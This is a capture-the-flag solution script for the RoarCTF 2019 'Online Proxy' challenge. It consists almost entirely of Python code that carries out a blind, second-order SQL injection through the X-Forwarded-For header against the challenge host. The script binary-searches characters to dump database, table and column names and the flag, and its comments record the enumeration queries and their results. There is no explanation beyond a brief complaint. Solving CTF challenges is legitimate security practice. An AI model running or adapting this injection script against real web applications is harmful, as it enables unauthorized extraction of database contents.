[RoarCTF 2019]Online Proxy
恶心坏了
import requests
url = "http://node3.buuoj.cn:27220/"
def exe_sql(sql_str):
result = ""
i = 0
while(True):
head = 32
tail = 127
i += 1
while(head<tail):
mid = head + tail >> 1
payload = "0'or ascii(substr(("+sql_str+"),%d,1))>%d or '0" % (i,mid)
headers={"X-Forwarded-For":payload}
#print(headers)
#print(payload)
headers1={"X-Forwarded-For":"233"}
s = requests.Session()
r = s.get(url,headers=headers)
r = s.get(url,headers=headers1)
r = s.get(url,headers=headers1)
#print(r.text)
if("Last Ip: 1 " in r.text):
head = mid + 1
else :
tail = mid
if(head!=32):
result += chr(head)
print(result)
else:
break
#exe_sql("select database()")#ctf
#exe_sql("select group_concat(schema_name) from information_schema.schemata")#F4l9_D4t4B45e
#exe_sql("select group_concat(table_name) from information_schema.tables where table_schema=database()") #ip_log
#exe_sql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'")#F4l9_t4b1e
#exe_sql("select group_concat(column_name) from information_schema.columns where table_schema='F4l9_D4t4B45e' and table_name='F4l9_t4b1e'")#
exe_sql("select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e")#F4l9_C01uMn
